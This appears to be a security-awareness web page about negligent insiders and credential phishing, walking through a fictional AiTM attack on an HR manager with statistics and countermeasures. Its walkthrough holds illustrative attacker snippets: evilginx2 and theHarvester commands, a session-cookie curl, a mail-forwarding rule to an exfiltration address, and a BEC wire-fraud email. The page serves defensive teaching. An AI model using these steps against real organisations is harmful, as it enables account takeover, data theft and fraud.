CERT Insider Threat / MITRE ATT&CK T1078 - Valid Accounts

NEGLIGENT Insider Threat Unintentional Credential Compromise by Employees

The most common and costliest insider threat isn't malice - it's carelessness. Employees who share passwords, click phishing links, misconfigure systems, or fall for social engineering hand attackers the keys to the kingdom without ever knowing it.

⚠️ 68% OF BREACHES INVOLVE A HUMAN ELEMENT - VERIZON DBIR 2024
Negligent Insider Incidents
56%
Of insider threat incidents are caused by negligence - the single largest insider threat category
Average Cost Per Incident
$6.6M
Average annual cost of a negligent insider program - Ponemon Institute 2023
Phishing Click Rate
17.8%
Average employee phishing simulation click rate - even after training programs are deployed
Password Sharing Rate
49%
Of employees admit to sharing work credentials with colleagues - LastPass survey 2023
01

01 / The Negligent Insider - Personas

👩‍💼
The Phishing Victim
MOST COMMON - ALL DEPARTMENTS
"The email looked exactly like IT Support. I just clicked the link and entered my password. I didn't know..."
Clicks a convincing spear-phishing link and enters credentials into a fake login portal. May also approve MFA push requests from the attacker due to notification fatigue.
⚠ RISK: FULL ACCOUNT TAKEOVER
👨‍💻
The Password Sharer
CONVENIENCE-DRIVEN
"I just gave Sarah my login while I was on vacation so she could pull the reports. It was easier than IT."
Shares credentials with colleagues, assistants, or contractors to enable workflow continuity. Creates untracked access, bypasses audit trails, and enables credential harvesting from additional systems.
⚠ RISK: SHARED CREDENTIAL EXPOSURE
👴
The Social Engineering Target
VISHING / PRETEXTING
"He said he was from the help desk and needed my password to reset my account. I just wanted to help..."
Targeted by voice phishing (vishing) or pretexting - an attacker impersonates IT, a vendor, or a colleague and convinces the employee to reveal credentials or reset MFA verbally.
⚠ RISK: DIRECT CREDENTIAL DISCLOSURE
👩‍🔬
The Misconfiguring Developer
TECHNICAL - HIGH IMPACT
"I just pushed the config to GitHub so the team could pull it. I didn't realize the API keys were in there."
Accidentally commits credentials, API keys, or secrets to public code repositories. Attackers continuously scrape GitHub for leaked secrets using automated tooling within minutes of any commit.
⚠ RISK: API / CLOUD CREDENTIAL LEAK
🧑‍💼
The Shadow IT User
UNSANCTIONED TOOLS
"I just signed up for that AI tool with my work email and Google SSO. It seemed useful for my reports..."
Authenticates corporate SSO or enters work credentials into unauthorized SaaS apps, AI tools, or browser extensions - unknowingly granting OAuth access to corporate data or exposing credentials to unvetted third parties.
⚠ RISK: OAUTH SCOPE OVER-GRANT
👩‍🏫
The Departing Employee
OFFBOARDING GAP
"I still had access for three months after I left. I didn't even realize - I just kept using my old login to check things."
Former employee retains active credentials due to incomplete offboarding. While not always malicious, active accounts of departed employees represent unmonitored access vectors easily exploited or abused.
⚠ RISK: ORPHANED ACCOUNT ACCESS
02

02 / Anatomy of a Phishing Lure

The Bait - Spot the Red Flags
This email appears in the victim's inbox. How many deceptions can you identify?
🔒 mail.company-secure-portal.com
From: IT-Support <it-support@c0mpany-helpdesk.com>
⚠️ URGENT: Your account will be disabled in 24 hours
Today, 8:47 AM · To: jennifer.martinez@company.com

Dear Jennifer,


Our security systems have detected unusual login activity on your account from an unrecognized device in Lagos, Nigeria.


To protect your account, you must verify your identity within 24 hours or your access will be permanently suspended.


Please click below to verify your identity immediately:

🔐 Verify My Account Now

If you believe this is an error, contact your IT department or click here to dismiss.

IT Security Team · Company Internal Systems
This is an automated security alert. Do not reply to this email.
RED FLAG ANALYSIS
1
SPOOFED SENDER DOMAIN
c0mpany-helpdesk.com uses a zero (0) instead of an "o" - a lookalike domain. The display name says "IT-Support" but the actual address is external and malicious.
2
URGENCY & FEAR TACTICS
"24 hours" deadline and "permanently suspended" creates panic. Attackers manufacture urgency to bypass rational thinking and trigger impulsive clicks before the victim can verify.
3
SUSPICIOUS URL IN BROWSER BAR
The browser shows company-secure-portal.com - not the real company domain. HTTPS and a padlock only mean the connection is encrypted, NOT that the site is legitimate.
4
PERSONALIZED TO LOWER GUARD
Using the victim's real first name (Jennifer) and correct email address - harvested from LinkedIn or prior breaches - makes the email feel genuinely targeted and legitimate.
5
NO INTERNAL VERIFICATION PATH
Legitimate IT teams never ask you to verify credentials via email link. Real alerts always provide a way to contact IT directly - the "dismiss" link here leads to the same attacker-controlled page.
03

03 / Attack Flow Diagram

🕵️ ATTACKER External threat actor SEND 📧 PHISH LURE Email / SMS / Call Spoofed sender DECEIVE 👩‍💼 NEGLIGENT USER Clicks link Enters credentials Approves MFA push CAPTURE 🔑 CREDS STOLEN User + pass + MFA Session hijacked LOGIN 🏢 CORP SYSTEMS Email / VPN / SaaS Attacker logged in EXFIL 💀 DATA BREACH Lateral movement EMPLOYEE UNAWARE ① ACTOR ② LURE ③ VICTIM CLICKS ④ CREDS STOLEN ⑤ ACCESS GAINED ⑥ BREACH
04

04 / Step-by-Step Walkthrough

Phase 01 - Attacker Preparation

The Lure is Crafted

🕵️
ATTACKER ACTION
Reconnaissance & Targeting

Before sending a single email, the attacker researches their target. OSINT gathering from LinkedIn, company websites, and data broker sites reveals employee names, roles, reporting structures, and email formats - enabling hyper-personalized lures.

  • LinkedIn scraping reveals target's name, manager, department, and tenure
  • Email format guessed or confirmed: firstname.lastname@company.com pattern
  • Lookalike domain registered: c0mpany-helpdesk.com (0 instead of o) - $10 cost
  • Spear phish references victim's real manager name to establish false legitimacy
  • Email template mimics exact formatting, logos, and footer of genuine IT communications
attacker - OSINT & prep
# Harvest target employee data $ theHarvester -d company.com -b linkedin jennifer.martinez@company.com - HR Manager michael.chen@company.com - IT Director sarah.kim@company.com - CFO   # Register convincing lookalike domain $ whois c0mpany-helpdesk.com Domain registered: available - $9.99/yr   # Clone login portal with HTTrack $ evilginx2 phishlets enable office365 [+] Phishing proxy live - MFA bypass ready [+] Lure sent to jennifer.martinez@company.com
Phase 02 - Delivery

The Email Arrives

👩‍💼
EMPLOYEE
Jennifer Martinez - HR Manager

The phishing email lands in Jennifer's inbox on a busy Monday morning. It bypassed spam filters because the domain was freshly registered, the email was sent via a reputable relay, and it passed SPF/DKIM checks on its own domain.

  • Email arrives 8:47 AM - attacker chose Monday morning peak stress time deliberately
  • Display name shows "IT-Support" - most email clients hide the actual sending address
  • Subject line's ⚠️ emoji and ALL-CAPS trigger urgent emotional response
  • References Jennifer's real name - feels personalized and targeted, not bulk spam
  • Email passed SPF/DKIM checks on the attacker's own (newly registered) domain
📱 JENNIFER'S INBOX - MONDAY 8:47 AM
⚠️ IT-SUPPORT (c0mpany-helpdesk.com)

URGENT: Your account will be disabled in 24 hours due to suspicious login from Nigeria.

Click to verify identity: company-secure-portal.com/verify

JENNIFER (internal monologue)

This looks real... the IT team does send these security alerts. And they used my name. I don't want my account suspended before the board meeting today.

⚠️ IT-SUPPORT - REMINDER (2 mins later)

You have 23 hours and 58 minutes remaining to verify before account suspension. Act now.

JENNIFER

Okay, I'll just quickly verify... I can ask IT about it later if needed.
[clicks the link]

Phase 03 - Credential Entry

The Employee Clicks

😰
VICTIM STATUS
Entering Credentials on Fake Portal

Jennifer lands on a pixel-perfect replica of the company's Microsoft 365 login page. The site has a valid HTTPS certificate (green padlock) - which only proves the connection is encrypted, not that the site is legitimate. She enters her credentials.

  • Fake login page is an AiTM proxy - passes credentials through to real Microsoft in real time
  • Victim sees the "real" Microsoft MFA prompt because the proxy is relaying everything live
  • Jennifer approves the MFA push on her phone - the attacker now has a valid session cookie
  • After submission, Jennifer is redirected to real company portal - she has no idea anything happened
  • The entire capture takes under 60 seconds - credentials and session token exfiltrated instantly
evilginx2 - real-time capture
# Attacker's AiTM proxy - credential capture   [08:51:33] Session #4 - new victim [08:51:41] Username: jennifer.martinez@company.com [08:51:44] Password: SpringTime2024! ↑ victim typed this on fake page   # MFA challenge relayed in real time [08:51:46] MFA push sent to victim phone [08:51:51] Victim approved MFA push   [08:51:52] SESSION TOKEN CAPTURED ✓ [08:51:52] MFA fully bypassed [!] Victim redirected to real portal - no suspicion
Phase 03b - Alternative Vector

The Vishing Call

📞
VECTOR
Voice Phishing - IT Impersonation

In parallel or as an alternative, attackers use voice phishing (vishing) - calling employees while impersonating IT support. The social pressure of a live conversation is highly effective: most people find it harder to say no to a person than to ignore an email.

  • Caller ID spoofed to display internal IT helpdesk number - appears completely legitimate
  • Attacker already knows employee name, department, and manager from OSINT reconnaissance
  • Pretext: "We detected ransomware on your machine and need to remote in immediately"
  • Employee asked to read back their temp password reset code or approve a remote session
  • Some attacks combine email lure with immediate follow-up call to push victim to click
📞 INBOUND CALL - "IT HELPDESK" (spoofed) - 2:14 PM
🔴 "DAVID CHEN - IT HELPDESK" (ATTACKER)

Hi Jennifer, this is David from IT Security. I'm calling because our systems flagged your workstation with a critical ransomware alert. I need to help you remotely right now before it spreads to the file server.

JENNIFER

Oh no - really? David always calls when there's an issue... Okay, what do I need to do?

🔴 ATTACKER

I've sent you a password reset code via text. Can you read that back to me so I can authenticate the remote session? We need to act in the next 2 minutes.

JENNIFER - (reads her MFA code)

It says... 847291. Is that what you need?

🔴 ATTACKER

Perfect, thank you Jennifer. All sorted. You'll get a confirmation email shortly. Great job acting quickly!

Phase 04 - Access Exploitation

Credentials Put to Work

🔓
ATTACKER NOW HAS
Full Access as Jennifer Martinez

With Jennifer's session token and credentials, the attacker logs in as her from an anonymous VPN. They now have access to everything Jennifer can access - email, SharePoint, HR systems, payroll, and any SSO-connected applications - without triggering additional alerts.

  • Attacker logs into Microsoft 365 from a VPN endpoint matching Jennifer's country
  • Sets up silent email forwarding rule to copy all inbound mail to attacker inbox
  • Searches email for: "password", "VPN", "AWS", "salary", "acquisition", "board"
  • Accesses HR system through SSO - views employee salary, SSN, and banking details
  • Discovers upcoming M&A deal in executive email thread - highly sensitive insider info
microsoft 365 - attacker session
# Attacker logs in with stolen session token $ curl -H "Cookie: ESTSAUTH=..." https://outlook.office.com 200 OK - Signed in as jennifer.martinez@company.com   # Set silent email forward rule POST /api/v2.0/me/MailFolders/Inbox/MessageRules ForwardTo: exfil@protonmail.com (hidden) Rule created - all emails silently copied   # Search for sensitive content $ Search-Mailbox -query "acquisition OR salary OR VPN" Found: 847 messages - exfiltrating now Found: Project Phoenix M&A - CONFIDENTIAL ⚠
Phase 05 - Expansion

Lateral Movement

🌐
EXPANDING FROM
Jennifer's Account Outward

HR access is a goldmine for lateral movement. Employee records contain SSNs, banking details, and - critically - every other employee's email address and manager relationship. The attacker uses Jennifer's trusted position to pivot to higher-value targets.

  • Sends spear phish to CFO posing as Jennifer - "Can you approve this urgent wire transfer?"
  • Resets password of a contractor account found in HR system with weaker MFA configuration
  • Password spray against other employee emails using common corporate password patterns
  • Uses Jennifer's SSO session to access AWS console through IAM - discovers cloud resources
  • Business Email Compromise: sends fraudulent invoice to finance team as "Jennifer from HR"
lateral movement - BEC & pivoting
# Business Email Compromise from Jennifer's account # Email sent TO: r.wilson@company.com (CFO) # FROM: jennifer.martinez@company.com (real account)   Subject: Urgent - Wire Transfer Needed Today Hi Robert - I need you to process a wire for vendor payment $94,000. Time sensitive. Account: [attacker mule account details]   # Pivot to AWS via SSO $ aws sts get-caller-identity --profile jennifer-sso Account: 123456789012 - Role: HRAdmin [!] S3 bucket hr-employee-data - 12,000 records
Phase 06 - Discovery & Aftermath

The Breach is Found

🚨
DISCOVERY - WEEKS LATER
Damage Already Done

Weeks after the initial click, the breach is discovered - often not by security tools but by Jennifer herself noticing odd emails, or by finance flagging the fraudulent wire transfer. By then, months of email have been exfiltrated and the attacker has long since covered their tracks.

  • Jennifer notices "Sent" items she didn't write - alerts IT Security
  • Security team discovers the hidden email forwarding rule - active for 6 weeks
  • Log analysis reveals foreign IP login immediately after Jennifer's session on same day
  • 12,000 employee PII records exfiltrated from S3 - GDPR/HIPAA breach notifications required
  • CFO approved $94K wire transfer - attacker received funds 4 weeks prior, unrecoverable
incident response - breach timeline
# IR Team - Azure AD sign-in log review $ Get-AzureADAuditSignInLogs -Filter "userPrincipalName eq 'jennifer.martinez@company.com'"   08:51 - j.martinez - 10.4.2.1 (corp VPN) ✓ 08:52 - j.martinez - 185.220.x.x (Tor exit) ✗ ↑ attacker used stolen session 60sec later   # Hidden forwarding rule found Rule: Forward ALL mail → exfil@protonmail.com Created: 6 weeks ago | 2,847 emails forwarded   [BREACH] 12,000 employee PII records - S3 [BREACH] $94,000 wire fraud - unrecoverable [BREACH] M&A intel exfiltrated - Project Phoenix
STEP 1 OF 7
05

05 / The Timeline of Damage

MINUTE 0 - DAY OF ATTACK
Credentials Compromised
Jennifer clicks the link at 8:51 AM. Within 60 seconds, the attacker has her credentials, session token, and MFA bypass. Jennifer has no idea - she's redirected to the real company portal and continues her workday normally.
HOURS 1–4 - SAME DAY
Reconnaissance and Setup
Attacker explores Jennifer's email silently. Sets up forwarding rule. Maps her contacts, reads sensitive threads, and identifies the CFO and finance team. Discovers the M&A deal codename "Project Phoenix." All actions logged as Jennifer.
DAY 3 - THREE DAYS LATER
BEC Wire Fraud Executed
Attacker sends wire transfer request from Jennifer's real email account to CFO Robert Wilson. The $94,000 "vendor payment" is approved and transferred before finance realizes anything is wrong. Funds moved to mule account within hours.
WEEKS 2–6 - ONGOING
Silent Data Exfiltration
For six weeks, every email Jennifer receives is silently copied to the attacker. 12,000 employee PII records exfiltrated from AWS S3. M&A intelligence passed to threat actor clients. Attacker accesses HR system multiple times - all sessions appear as Jennifer.
WEEK 7 - DISCOVERY
Breach Detected - Damage Tallied
Jennifer notices emails in her Sent folder she never wrote. IT Security discovers the forwarding rule, foreign IP logins, and S3 exfiltration logs. Mandatory GDPR/HIPAA breach notifications triggered. Regulatory fines, legal costs, and remediation expenses begin - estimated $3.2M total impact.
06

06 / Phishing Susceptibility by Department

Simulated Phishing Click Rates
Internal phishing simulation results - % of employees who clicked without training.
Finance / HR
71%
Operations
58%
Sales / Marketing
44%
Engineering
32%
Sec-Aware Trained
18%
VERIZON DBIR 2024
68% of breaches involved the human element - social engineering, errors, or misuse. Phishing remains the #1 initial access vector for credential theft.
TRAINING EFFECTIVENESS
Organizations with ongoing security awareness training see a 64% reduction in phishing click rates within 12 months. One-time training alone has minimal lasting effect.
REPORTING CULTURE
Only 17% of employees who click phishing links report the incident. Fear of embarrassment keeps the majority silent - allowing attackers to operate undetected for weeks or months.
TIME TO CLICK
The median time for the first click on a phishing campaign is 21 seconds after delivery. Most breaches begin within the first hour of an email campaign launching.
07

07 / Defensive Countermeasures

🎓
Continuous Security Awareness Training
Monthly simulated phishing campaigns with immediate teachable moments. Role-specific training for high-risk departments (HR, Finance). Gamified security culture - reward reporters, not just penalize clickers.
🔑
Phishing-Resistant MFA (FIDO2 / Passkeys)
Replace SMS OTP and push-notification MFA with hardware keys or passkeys bound to the legitimate domain. Even if an employee submits credentials to a fake site, the attacker cannot complete authentication without the physical device.
📧
Email Security Controls
Enforce DMARC, DKIM, and SPF on all outbound domains. Deploy advanced email filtering (Microsoft Defender, Proofpoint) with lookalike domain detection. Add [EXTERNAL] banners to all inbound email from outside the organization.
🚦
Conditional Access & Zero Trust
Enforce Conditional Access policies requiring compliant managed devices. Block access from Tor exit nodes and known VPN IP ranges. Impossible travel detection triggers re-authentication challenge when logins occur from geographically impossible locations.
👁️
Insider Threat Monitoring
Deploy UEBA (User and Entity Behavior Analytics) to baseline normal employee behavior and alert on deviations: bulk email access, new forwarding rules, after-hours logins, and mass file downloads. Detect compromised accounts acting out of character.
🔐
Privileged Access & Least Privilege
Limit access to only what each role requires. HR staff should not have bulk download rights to all employee records. Implement just-in-time (JIT) access for sensitive operations. Segment data access - breach of one account shouldn't expose everything.
📋
Credential Sharing Policies & PAM
Strict no-credential-sharing policy with technical enforcement through Privileged Access Management (PAM) tools. Shared accounts replaced with individual accounts and proper delegation. Enforce password managers across all staff to eliminate Post-it passwords.
🔔
Blameless Reporting Culture
Create psychological safety for employees who fall for phishing - punitive cultures drive incidents underground. The faster an employee reports a suspicious click, the faster security teams can respond. Reward reporters visibly and publicly.
🚪
Automated Offboarding
Immediately disable all accounts, revoke tokens, and remove group memberships upon employee departure - triggered automatically by HRIS offboarding workflow, not manual IT tickets. Orphaned accounts are silent entry points months after termination.